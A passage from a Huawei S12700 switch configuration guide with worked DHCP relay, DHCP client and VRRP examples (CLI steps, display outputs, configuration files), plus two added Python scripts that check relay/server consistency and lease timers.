# Run the display dhcp relay interface vlanif 100 command on SwitchA to check the DHCP
relay configuration.
[SwitchA] display dhcp relay interface vlanif 100
DHCP relay agent running information of interface Vlanif100 :
Server IP address [00] : 192.168.20.2
Gateway address in use : 10.10.20.1

# Run the display ip pool command on SwitchB to check the IP address allocation of pool1.
For example, the enterprise has 100 terminals.
[SwitchB] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.10.20.1
Network : 10.10.20.0
Mask : 255.255.255.0
VPN instance : --

--------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
--------------------------------------------------------------------------
10.10.20.1 10.10.20.254 253 100 153(0) 0 0
--------------------------------------------------------------------------

----End


Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200
#
dhcp enable
#
interface Vlanif100
ip address 10.10.20.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 192.168.20.2
#
interface Vlanif200
ip address 192.168.20.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 200
#

interface GigabitEthernet1/0/2
port link-type access
port default vlan 100
#

return

Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 200
#
dhcp enable
#
ip pool pool1
gateway-list 10.10.20.1
network 10.10.20.0 mask 255.255.255.0
#
interface Vlanif200
ip address 192.168.20.2 255.255.255.0
dhcp select global
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 200
#
ip route-static 10.10.20.0 255.255.255.0 192.168.20.1
#

return
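A check a practitioner would want after following the steps above, as an added example that is not part of the original document or Huawei's code: a Python script that parses the relay (SwitchA) and server (SwitchB) configuration files and verifies that they agree with each other. The two configuration texts are constructed from the page, written with the indentation VRP uses under interface and ip pool blocks; the parser understands only the statements this example needs, and the finding messages are the example's own wording. It flags the mistakes that most often leave clients without addresses: DHCP not enabled globally, a server-ip that is not an address on the server, a pool whose network does not contain the relay interface address (the giaddr the server will see), a gateway-list that differs from that address, and a missing route back to the client segment.

```python
# Added example, not Huawei code: static check of the 8.1.4 relay/server configuration.
# The two texts are constructed from the page; the parser only knows the statements used here.
import ipaddress
import re

SWITCH_A = """\
dhcp enable
interface Vlanif100
 ip address 10.10.20.1 255.255.255.0
 dhcp select relay
 dhcp relay server-ip 192.168.20.2
interface Vlanif200
 ip address 192.168.20.1 255.255.255.0
"""

SWITCH_B = """\
dhcp enable
ip pool pool1
 gateway-list 10.10.20.1
 network 10.10.20.0 mask 255.255.255.0
interface Vlanif200
 ip address 192.168.20.2 255.255.255.0
 dhcp select global
ip route-static 10.10.20.0 255.255.255.0 192.168.20.1
"""


def parse_vrp(text: str) -> dict:
    """Group indented lines under their 'interface' / 'ip pool' block; keep other top-level lines."""
    cfg = {"global": [], "interfaces": {}, "pools": {}, "routes": []}
    block = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("#", "return"):
            continue
        if raw.startswith(" "):              # continuation of the current block
            if block is not None:
                block.append(line)
            continue
        block, words = None, line.split()
        if words[0] == "interface":
            block = cfg["interfaces"].setdefault(words[1], [])
        elif words[:2] == ["ip", "pool"]:
            block = cfg["pools"].setdefault(words[2], [])
        elif words[:2] == ["ip", "route-static"]:
            cfg["routes"].append(ipaddress.ip_network(f"{words[2]}/{words[3]}"))
        else:
            cfg["global"].append(line)
    return cfg


def first_match(lines: list, pattern: str):
    """Groups of the first line matching pattern, or None."""
    for line in lines:
        m = re.match(pattern, line)
        if m:
            return m.groups()
    return None


def interface_address(lines: list):
    g = first_match(lines, r"ip address (\S+) (\S+)$")
    return ipaddress.ip_interface(f"{g[0]}/{g[1]}") if g else None


def pool_definition(lines: list) -> tuple:
    net = first_match(lines, r"network (\S+) mask (\S+)$")
    gw = first_match(lines, r"gateway-list (\S+)$")
    return (ipaddress.ip_network(f"{net[0]}/{net[1]}") if net else None,
            ipaddress.ip_address(gw[0]) if gw else None)


def audit_relay(relay_text: str, server_text: str) -> list:
    """Findings about the relay/server pair; an empty list means they agree."""
    relay, server = parse_vrp(relay_text), parse_vrp(server_text)
    issues = []
    for role, cfg in (("relay", relay), ("server", server)):
        if "dhcp enable" not in cfg["global"]:
            issues.append(f"{role}: 'dhcp enable' missing, DHCP is off globally")
    server_addrs = {a.ip for a in map(interface_address, server["interfaces"].values()) if a is not None}
    pools = {name: pool_definition(lines) for name, lines in server["pools"].items()}
    for ifname, lines in relay["interfaces"].items():
        if "dhcp select relay" not in lines:
            continue
        addr = interface_address(lines)
        if addr is None:
            issues.append(f"relay {ifname}: relay enabled but the interface has no IP address")
            continue
        giaddr = addr.ip                           # the relay writes this into giaddr
        targets = [ipaddress.ip_address(l.split()[-1]) for l in lines
                   if l.startswith("dhcp relay server-ip ")]
        for target in targets:
            if target not in server_addrs:
                issues.append(f"relay {ifname}: server-ip {target} is not an address on the server")
        # the server picks the pool whose network contains giaddr, so pool and relay interface must match
        matching = [n for n, (net, _) in pools.items() if net is not None and giaddr in net]
        if not matching:
            issues.append(f"server: no pool whose network contains giaddr {giaddr}")
        for name in matching:
            if pools[name][1] != giaddr:
                issues.append(f"pool {name}: gateway-list {pools[name][1]} differs from relay address {giaddr}")
        # replies are unicast to giaddr, so the server needs a route back to the client segment
        if not any(giaddr in route for route in server["routes"]):
            issues.append(f"server: no static route back to {addr.network}")
    return issues
```

audit_relay(SWITCH_A, SWITCH_B) returns an empty list for the configuration as shown. Remove the ip route-static line from SWITCH_B and it reports the missing return route; change the pool to network 10.10.30.0 and it reports that no pool contains giaddr 10.10.20.1, which is exactly the case in which the server silently ignores every relayed request.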

Relevant Information
Video
Configure DHCP Server and Relay


8.1.5 Example for Configuring the Device as a DHCP Relay (Across a GRE Tunnel)
DHCP Relay Overview
A DHCP relay forwards DHCP packets between the DHCP server and clients. When the DHCP server and clients belong to different network segments, a DHCP relay needs to be configured. To the DHCP clients, the DHCP relay appears as the DHCP server; to the DHCP server, the DHCP relay appears as a DHCP client.
The DHCP relay function applies to large networks with many sparsely-distributed user
gateways. To reduce the maintenance workload, the network administrator does not want to
configure the DHCP server function on each aggregation switch (user gateway) and requires
that the DHCP server function be configured on a core device or an exclusive DHCP server
be deployed in the server area. In this case, the aggregation switches functioning as the user
gateways need to be configured with the DHCP relay function to implement exchange of
DHCP packets between the DHCP server and clients.
The DHCP relay and DHCP server can be deployed across a VPN (such as GRE or MPLS
L3VPN) network. A GRE tunnel is used as an example to describe how to configure a DHCP
relay.

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-5, an enterprise deploys its headquarters and branch in different areas.
A GRE tunnel is deployed between the headquarters and branch to enable them to
communicate through the Internet. To facilitate unified management, the enterprise
administrator deploys the DHCP server on Switch_1 in the headquarters to assign IP
addresses to the terminals in the headquarters and branch. The network segments 10.1.1.0/24
and 10.2.1.0/24 are planned for the headquarters and branch respectively.


Figure 8-5 Networking diagram for configuring the device as a DHCP relay

[Figure 8-5: Headquarters: Switch_1 (DHCP Server) with GE1/0/0 (VLANIF10, 192.168.20.1/24), GE2/0/0 (VLANIF30, 10.1.1.1/24) and Tunnel 192.168.40.1/24; LSW_1 connects the headquarters DHCP clients to Switch_1. Transit: Switch_2 with GE1/0/0 (VLANIF10, 192.168.20.2/24) and GE2/0/0 (VLANIF20, 192.168.30.1/24). Branch: Switch_3 (DHCP Relay) with GE1/0/0 (VLANIF20, 192.168.30.2/24), GE2/0/0 (VLANIF30, 10.2.1.1/24) and Tunnel 192.168.40.2/24; LSW_2 connects the branch DHCP clients to Switch_3. A GRE tunnel runs between Switch_1 and Switch_3.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Run OSPF between Switch_1, Switch_2, and Switch_3 to ensure the communication
between devices.
2. On Switch_1 and Switch_3, configure tunnel interfaces and create a GRE tunnel.
3. On Switch_1, configure the DHCP server based on the global address pool so that the
DHCP server can assign IP addresses from the global address pool to the terminals in the
headquarters and branch.
4. On Switch_3, the branch gateway, configure the DHCP relay function to forward DHCP packets
between the terminals and the DHCP server so that the terminals can apply to the DHCP
server for IP addresses.
NOTE

Use a Huawei S series switch as an example for the DHCP server (Switch_1).
Configure the interface link types and VLANs on LSW_1 and LSW_2 to implement Layer 2 communication.

Procedure
Step 1 Configure an IP address for each physical interface on Switch_1 through Switch_3.
# Configure Switch_1.
<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] vlan batch 10 30
[Switch_1] interface gigabitethernet 1/0/0
[Switch_1-GigabitEthernet1/0/0] port link-type trunk
[Switch_1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[Switch_1-GigabitEthernet1/0/0] quit
[Switch_1] interface gigabitethernet 2/0/0
[Switch_1-GigabitEthernet2/0/0] port link-type trunk
[Switch_1-GigabitEthernet2/0/0] port trunk allow-pass vlan 30
[Switch_1-GigabitEthernet2/0/0] quit


[Switch_1] interface vlanif 10
[Switch_1-Vlanif10] ip address 192.168.20.1 24
[Switch_1-Vlanif10] quit
[Switch_1] interface vlanif 30
[Switch_1-Vlanif30] ip address 10.1.1.1 24
[Switch_1-Vlanif30] quit

# Configure Switch_2.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] vlan batch 10 20
[Switch_2] interface gigabitethernet 1/0/0
[Switch_2-GigabitEthernet1/0/0] port link-type trunk
[Switch_2-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[Switch_2-GigabitEthernet1/0/0] quit
[Switch_2] interface gigabitethernet 2/0/0
[Switch_2-GigabitEthernet2/0/0] port link-type trunk
[Switch_2-GigabitEthernet2/0/0] port trunk allow-pass vlan 20
[Switch_2-GigabitEthernet2/0/0] quit
[Switch_2] interface vlanif 10
[Switch_2-Vlanif10] ip address 192.168.20.2 24
[Switch_2-Vlanif10] quit
[Switch_2] interface vlanif 20
[Switch_2-Vlanif20] ip address 192.168.30.1 24
[Switch_2-Vlanif20] quit

# Configure Switch_3.
<HUAWEI> system-view
[HUAWEI] sysname Switch_3
[Switch_3] vlan batch 20 30
[Switch_3] interface gigabitethernet 1/0/0
[Switch_3-GigabitEthernet1/0/0] port link-type trunk
[Switch_3-GigabitEthernet1/0/0] port trunk allow-pass vlan 20
[Switch_3-GigabitEthernet1/0/0] quit
[Switch_3] interface gigabitethernet 2/0/0
[Switch_3-GigabitEthernet2/0/0] port link-type trunk
[Switch_3-GigabitEthernet2/0/0] port trunk allow-pass vlan 30
[Switch_3-GigabitEthernet2/0/0] quit
[Switch_3] interface vlanif 20
[Switch_3-Vlanif20] ip address 192.168.30.2 24
[Switch_3-Vlanif20] quit
[Switch_3] interface vlanif 30
[Switch_3-Vlanif30] ip address 10.2.1.1 24
[Switch_3-Vlanif30] quit

Step 2 Run OSPF between Switch_1, Switch_2, and Switch_3.


# Configure Switch_1.
[Switch_1] ospf 1
[Switch_1-ospf-1] area 0
[Switch_1-ospf-1-area-0.0.0.0] network 192.168.20.0 0.0.0.255
[Switch_1-ospf-1-area-0.0.0.0] quit
[Switch_1-ospf-1] quit

# Configure Switch_2.
[Switch_2] ospf 1
[Switch_2-ospf-1] area 0
[Switch_2-ospf-1-area-0.0.0.0] network 192.168.20.0 0.0.0.255
[Switch_2-ospf-1-area-0.0.0.0] network 192.168.30.0 0.0.0.255
[Switch_2-ospf-1-area-0.0.0.0] quit
[Switch_2-ospf-1] quit

# Configure Switch_3.
[Switch_3] ospf 1
[Switch_3-ospf-1] area 0


[Switch_3-ospf-1-area-0.0.0.0] network 192.168.30.0 0.0.0.255
[Switch_3-ospf-1-area-0.0.0.0] quit
[Switch_3-ospf-1] quit

Step 3 Configure tunnel interfaces.


# Configure Switch_1.
[Switch_1] interface tunnel 1
[Switch_1-Tunnel1] tunnel-protocol gre
[Switch_1-Tunnel1] ip address 192.168.40.1 24
[Switch_1-Tunnel1] source 192.168.20.1
[Switch_1-Tunnel1] destination 192.168.30.2
[Switch_1-Tunnel1] quit

# Configure Switch_3.
[Switch_3] interface tunnel 1
[Switch_3-Tunnel1] tunnel-protocol gre
[Switch_3-Tunnel1] ip address 192.168.40.2 24
[Switch_3-Tunnel1] source 192.168.30.2
[Switch_3-Tunnel1] destination 192.168.20.1
[Switch_3-Tunnel1] quit

Step 4 Configure the DHCP server function on Switch_1.


# Enable the DHCP service. By default, the service is disabled.
[Switch_1] dhcp enable

# Create a global address pool and configure related parameters.


[Switch_1] ip pool pool1
[Switch_1-ip-pool-pool1] network 10.2.1.0 mask 255.255.255.0 //Network segment for terminals in the branch
[Switch_1-ip-pool-pool1] gateway-list 10.2.1.1 //Gateway address for terminals in the branch
[Switch_1-ip-pool-pool1] quit
[Switch_1] ip pool pool2
[Switch_1-ip-pool-pool2] network 10.1.1.0 mask 255.255.255.0 //Network segment for terminals in the headquarters
[Switch_1-ip-pool-pool2] gateway-list 10.1.1.1 //Gateway address for terminals in the headquarters
[Switch_1-ip-pool-pool2] quit

# Configure the terminals connected to VLANIF30 to obtain IP addresses from the global
address pool.
[Switch_1] interface vlanif 30
[Switch_1-Vlanif30] dhcp select global //Enable the DHCP server function based on the global address pool on the interface. By default, the function is disabled.
[Switch_1-Vlanif30] quit

# Configure a static route to the network segment of the terminals in the branch.
[Switch_1] ip route-static 10.2.1.0 255.255.255.0 tunnel 1

Step 5 Configure the DHCP relay function on Switch_3.

# Enable the DHCP service. By default, the service is disabled.
[Switch_3] dhcp enable

# Configure the DHCP relay function on VLANIF 30 and specify the DHCP server address for the relay.
[Switch_3] interface vlanif 30
[Switch_3-Vlanif30] dhcp select relay //Enable the DHCP relay function. By default, the function is disabled.
[Switch_3-Vlanif30] dhcp relay server-ip 10.1.1.1 //Configure the DHCP server IP address for the DHCP relay agent.


# Configure a static route to the network segment of the server.


[Switch_3] ip route-static 10.1.1.0 255.255.255.0 tunnel 1

Step 6 Configure each terminal (using the PC running Windows 7 as an example) to automatically
obtain an IP address.
1. Right-click Network and choose Properties to display the Network and Sharing
Center window.
2. Click Local Area Connection to display the Local Area Connection Status window.
3. Click Properties to display the Local Area Connection Properties window.
4. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties to display the
Internet Protocol Version 4 (TCP/IPv4) Properties window. Select Obtain an IP
address automatically, and click OK.
Step 7 Verify the configuration.
# Run the display dhcp relay interface vlanif 30 command on Switch_3 to check the DHCP
relay configuration.
[Switch_3] display dhcp relay interface vlanif 30
DHCP relay agent running information of interface Vlanif30 :
Server IP address [00] : 10.1.1.1
Gateway address in use : 10.2.1.1
# Run the display ip pool command on Switch_1 to check the IP address allocation of pool1
and pool2. For example, the headquarters has 100 terminals and the branch has 50 terminals.
[Switch_1] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.2.1.1
Network : 10.2.1.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.2.1.1 10.2.1.254 253 50 203(0) 0 0
-----------------------------------------------------------------------------
[Switch_1] display ip pool name pool2
Pool-name : pool2
Pool-No : 1
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 100 153(0) 0 0
-----------------------------------------------------------------------------

----End

Configuration Files
Configuration file of Switch_1
#
sysname Switch_1
#
vlan batch 10 30
#
dhcp enable
#
ip pool pool1
gateway-list 10.2.1.1
network 10.2.1.0 mask 255.255.255.0
#
ip pool pool2
gateway-list 10.1.1.1
network 10.1.1.0 mask 255.255.255.0
#
interface Vlanif10
ip address 192.168.20.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.1.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface Tunnel1
ip address 192.168.40.1 255.255.255.0
tunnel-protocol gre
source 192.168.20.1
destination 192.168.30.2
#
ospf 1
area 0.0.0.0
network 192.168.20.0 0.0.0.255
#
ip route-static 10.2.1.0 255.255.255.0 Tunnel1
#
return
Configuration file of Switch_2
#
sysname Switch_2
#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.20.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.30.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10


#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1
area 0.0.0.0
network 192.168.20.0 0.0.0.255
network 192.168.30.0 0.0.0.255
#
return

Configuration file of Switch_3
#
sysname Switch_3
#
vlan batch 20 30
#
dhcp enable
#
interface Vlanif20
ip address 192.168.30.2 255.255.255.0
#
interface Vlanif30
ip address 10.2.1.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.1.1.1
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface Tunnel1
ip address 192.168.40.2 255.255.255.0
tunnel-protocol gre
source 192.168.30.2
destination 192.168.20.1
#
ospf 1
area 0.0.0.0
network 192.168.30.0 0.0.0.255
#
ip route-static 10.1.1.0 255.255.255.0 Tunnel1
#
return

Relevant Information
Video
Configure DHCP Server and Relay


8.1.6 Example for Configuring a DHCP Client

DHCP Client Overview


A device can function as a DHCP client and dynamically obtain network parameters, including
its IP address, from a DHCP server. This removes manual address configuration, reduces
configuration errors, and allows the parameters to be managed centrally.

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 8-6, Switch_1 functions as the DHCP client to dynamically obtain
information including the IP address, DNS server address, and gateway address from the
DHCP server (Switch_2).

Figure 8-6 Networking diagram for configuring a device as the DHCP server

[Figure 8-6: Switch_2 (DHCP Server) connects through GE1/0/1 (VLANIF10, 192.168.1.1/24) to Switch_1 (DHCP Client, GE1/0/1, VLANIF10). The gateway (192.168.1.126/24) and the DNS server (192.168.1.2/24) are on the same network segment as Switch_2.]

Configuration Roadmap
1. Configure Switch_1 as the DHCP client to dynamically obtain the IP address from a
DHCP server.
2. Configure Switch_2 as the DHCP server to dynamically allocate network parameters
including IP addresses to Switch_1.


Procedure
Step 1 Configure Switch_1 as the DHCP client.
# Create VLAN 10, and add GE1/0/1 to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname Switch_1
[Switch_1] vlan 10
[Switch_1-vlan10] quit
[Switch_1] interface gigabitethernet 1/0/1
[Switch_1-GigabitEthernet1/0/1] port link-type trunk
[Switch_1-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch_1-GigabitEthernet1/0/1] quit

# Enable the DHCP client function on VLANIF 10.


[Switch_1] interface vlanif 10
[Switch_1-Vlanif10] ip address dhcp-alloc

Step 2 Create a global address pool on Switch_2 and set corresponding attributes.
1. Enable the DHCP service.
<HUAWEI> system-view
[HUAWEI] sysname Switch_2
[Switch_2] dhcp enable

2. Create VLAN 10, and add GE1/0/1 to VLAN 10.


[Switch_2] vlan 10
[Switch_2-vlan10] quit
[Switch_2] interface gigabitethernet 1/0/1
[Switch_2-GigabitEthernet1/0/1] port link-type trunk
[Switch_2-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[Switch_2-GigabitEthernet1/0/1] quit

3. Configure VLANIF 10 to work in global address pool mode.


[Switch_2] interface vlanif 10
[Switch_2-Vlanif10] ip address 192.168.1.1 24
[Switch_2-Vlanif10] dhcp select global
[Switch_2-Vlanif10] quit

4. Create an address pool and set corresponding attributes.


[Switch_2] ip pool pool1
[Switch_2-ip-pool-pool1] network 192.168.1.0 mask 24
[Switch_2-ip-pool-pool1] gateway-list 192.168.1.126
[Switch_2-ip-pool-pool1] dns-list 192.168.1.2
[Switch_2-ip-pool-pool1] excluded-ip-address 192.168.1.2
[Switch_2-ip-pool-pool1] quit

Step 3 Verify the configuration.


# Run the display this command on VLANIF 10 of Switch_1 to view the DHCP client
configuration.
[Switch_1] interface vlanif 10
[Switch_1-Vlanif10] display this
#
interface Vlanif10
ip address dhcp-alloc
#
return

# After VLANIF 10 obtains an IP address, run the display dhcp client command on Switch_1
to view the status of the DHCP client on VLANIF 10.
[Switch_1] display dhcp client
DHCP client lease information on interface Vlanif10 :
Current machine state : Bound
Internet address assigned via : DHCP
Physical address : 0025-9efb-be55
IP address : 192.168.1.254
Subnet mask : 255.255.255.0
Gateway ip address : 192.168.1.126
DHCP server : 192.168.1.1
Lease obtained at : 2014-09-10 20:30:39
Lease expires at : 2014-09-11 20:30:39
Lease renews at : 2014-09-11 08:30:39
Lease rebinds at : 2014-09-11 17:30:39
DNS : 192.168.1.2

# On Switch_2, run the display ip pool name pool1 command to view IP address allocation
in the address pool. The Used field displays the number of used IP addresses in the address
pool.
[Switch_2] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : 192.168.1.2
NBNS-server0 : -
Netbios-type : -
Position : Local Status : Unlocked
Gateway-0 : 192.168.1.126
Network : 192.168.1.0
Mask : 255.255.255.0
VPN instance : --

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
192.168.1.1 192.168.1.254 253 1 251(0) 0 1
-----------------------------------------------------------------------------

----End
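The timers in the display dhcp client output above are not arbitrary. As an added example that is not part of the original document or Huawei's code, the following Python recomputes them from the lease length using the RFC 2131 defaults, T1 = 0.5 x lease for renewal and T2 = 0.875 x lease for rebinding, and maps a point in time to the client state: with a one-day lease obtained at 20:30:39, renewal falls 12 hours later at 08:30:39 and rebinding 21 hours later at 17:30:39, exactly as displayed. The output text is constructed from the values on the page; the function names are assumptions of the example.

```python
"""Added example, not Huawei code: checks the renew/rebind timers of 'display dhcp client'
against the RFC 2131 defaults (T1 = 0.5 * lease, T2 = 0.875 * lease). The output below is
constructed from the values shown on this page."""
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

DISPLAY_DHCP_CLIENT = """\
DHCP client lease information on interface Vlanif10 :
 Current machine state           : Bound
 Internet address assigned via   : DHCP
 Physical address                : 0025-9efb-be55
 IP address                      : 192.168.1.254
 Subnet mask                     : 255.255.255.0
 Gateway ip address              : 192.168.1.126
 DHCP server                     : 192.168.1.1
 Lease obtained at               : 2014-09-10 20:30:39
 Lease expires at                : 2014-09-11 20:30:39
 Lease renews at                 : 2014-09-11 08:30:39
 Lease rebinds at                : 2014-09-11 17:30:39
 DNS                             : 192.168.1.2
"""


def parse_display(text: str) -> dict:
    """'Field : value' lines into a dict; split on the first colon so timestamps stay intact."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and value.strip():
            fields[key.strip()] = value.strip()
    return fields


def expected_timers(obtained: datetime, lease: timedelta,
                    t1: float = 0.5, t2: float = 0.875) -> dict:
    """RFC 2131 4.4.5 defaults: T1 at half the lease, T2 at seven eighths of it."""
    return {"renews": obtained + lease * t1,
            "rebinds": obtained + lease * t2,
            "expires": obtained + lease}


def client_state(now: datetime, timers: dict) -> str:
    """Which phase of the lease the client is in at 'now' (RFC 2131 4.4.5)."""
    if now < timers["renews"]:
        return "Bound"       # using the address, no traffic to the server
    if now < timers["rebinds"]:
        return "Renewing"    # unicast DHCPREQUEST to the server that granted the lease
    if now < timers["expires"]:
        return "Rebinding"   # broadcast DHCPREQUEST to any server
    return "Init"            # lease expired: stop using the address, start over with DISCOVER


def state_at(when: str, timers: dict) -> str:
    """client_state() for a timestamp written in the device's display format."""
    return client_state(datetime.strptime(when, FMT), timers)


def check_lease(text: str) -> dict:
    """Compare the timers the device displays with the RFC defaults for that lease length."""
    f = parse_display(text)
    obtained = datetime.strptime(f["Lease obtained at"], FMT)
    expires = datetime.strptime(f["Lease expires at"], FMT)
    timers = expected_timers(obtained, expires - obtained)
    return {
        "lease_seconds": int((expires - obtained).total_seconds()),
        "renews_matches_t1": datetime.strptime(f["Lease renews at"], FMT) == timers["renews"],
        "rebinds_matches_t2": datetime.strptime(f["Lease rebinds at"], FMT) == timers["rebinds"],
        "timers": timers,
    }


if __name__ == "__main__":
    result = check_lease(DISPLAY_DHCP_CLIENT)
    print(result["lease_seconds"], result["renews_matches_t1"], result["rebinds_matches_t2"])
    for when in ("2014-09-11 08:00:00", "2014-09-11 12:00:00",
                 "2014-09-11 18:00:00", "2014-09-11 21:00:00"):
        print(when, state_at(when, result["timers"]))
```

The same check applied to a device whose renew or rebind time does not match its lease length points at a server that sent explicit T1/T2 options (58 and 59) or at a client clock that jumped; either way the Lease renews at line is where a stuck Renewing client is first visible.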

Configuration Files
Configuration file of Switch_1
#
sysname Switch_1
#
vlan batch 10
#
interface Vlanif10
ip address dhcp-alloc
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
return

Configuration file of Switch_2
#
sysname Switch_2
#
vlan batch 10
#
dhcp enable
#
ip pool pool1
gateway-list 192.168.1.126
network 192.168.1.0 mask 255.255.255.0
excluded-ip-address 192.168.1.2
dns-list 192.168.1.2
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
return

Relevant Information
Video
Configure DHCP Server and Relay

8.1.7 Example for Configuring DHCP Servers Based on the Global Address Pool on the Same Network Segment in VRRP Networking

DHCP Server Overview


Users require that all terminals on a network dynamically obtain network parameters such as
IP addresses, DNS server IP address, routing information, and gateway information. The users
do not need to manually configure the network parameters including terminal IP addresses. In
addition, some mobile terminals (for example, mobile phones, tablets, and laptops) should
support plug-and-play, without modification on network parameters each time. To meet these
requirements, the DHCP server function can be configured on an aggregation-layer user
gateway or a core-layer device to assign network parameters such as IP addresses to
terminals.
The Dynamic Host Configuration Protocol (DHCP) uses the client/server mode to
dynamically configure and uniformly manage network parameters for users. The DHCP
server uses an address pool to assign network parameters such as IP addresses to the users.
The global address pool or an interface address pool can be used.
An interface address pool is simple to configure, but it can be used only when the users and
the DHCP server belong to the same network segment, and the server then assigns network
parameters only to users on that interface. It suits small networks with a limited number of
devices and a manageable configuration and maintenance workload. After the DHCP server
function based on the interface address pool is configured on the user gateway, the hosts and
mobile terminals on the interface automatically obtain network parameters such as IP
addresses, without manual configuration and modification.
Compared with an interface address pool, a global address pool suits large networks. The
DHCP server function based on the global address pool is configured on a core device, or a
dedicated DHCP server is used to assign network parameters such as IP addresses, and the
user gateway only needs to be enabled with the DHCP relay function. For details, see 8.1.4
Example for Configuring the Device as a DHCP Relay (on the Same Network).

Configuration Notes
This example applies to all versions of the S12700 switches.

NOTE
To know details about software mappings, see Switch Software Mapping Search.


Networking Requirements
As shown in Figure 8-7, a host in an enterprise is dual-homed to SwitchA and SwitchB
through Switch. SwitchA functions as the master DHCP server to allocate IP addresses to the
host. If the master DHCP server fails, a backup DHCP server must allocate an IP address to
the host.

Figure 8-7 Networking diagram for configuring a device as the DHCP server
[Figure 8-7: SwitchA (Master DHCP Server, GE1/0/2, VLANIF100, 10.1.1.1/24) and SwitchB (Backup DHCP Server, GE1/0/2, VLANIF100, 10.1.1.129/24) form VRRP group VRID 1 with virtual IP address 10.1.1.111. Switch connects the DHCP client on GE1/0/1 to SwitchA on GE1/0/2 and to SwitchB on GE1/0/3; SwitchA and SwitchB are also linked to each other through GE1/0/5 on each.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure IP addresses for interfaces connecting SwitchA and SwitchB to implement
network-layer connectivity. Configure Switch to transparently transmit Layer 2 packets.
2. Configure a VRRP group on SwitchA and SwitchB. SwitchA has a higher priority and
functions as the DHCP server to allocate IP addresses to clients. SwitchB has a lower
priority and functions as a backup DHCP server.
3. Create global address pools on SwitchA and SwitchB, and set corresponding attributes.
4. Configure a loop prevention protocol on Switch, SwitchA, and SwitchB to prevent loops.
In this example, STP is configured.

Procedure
Step 1 Configure network-layer connectivity among devices.
# Configure IP addresses for interfaces connecting SwitchA and SwitchB. SwitchA is used as
an example. The configuration on SwitchB is similar to that on SwitchA. For details, see the
configuration file of SwitchB.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type hybrid
[SwitchA-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] port link-type hybrid
[SwitchA-GigabitEthernet1/0/5] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/5] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/5] quit
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit

# Configure Layer 2 transparent transmission on Switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid
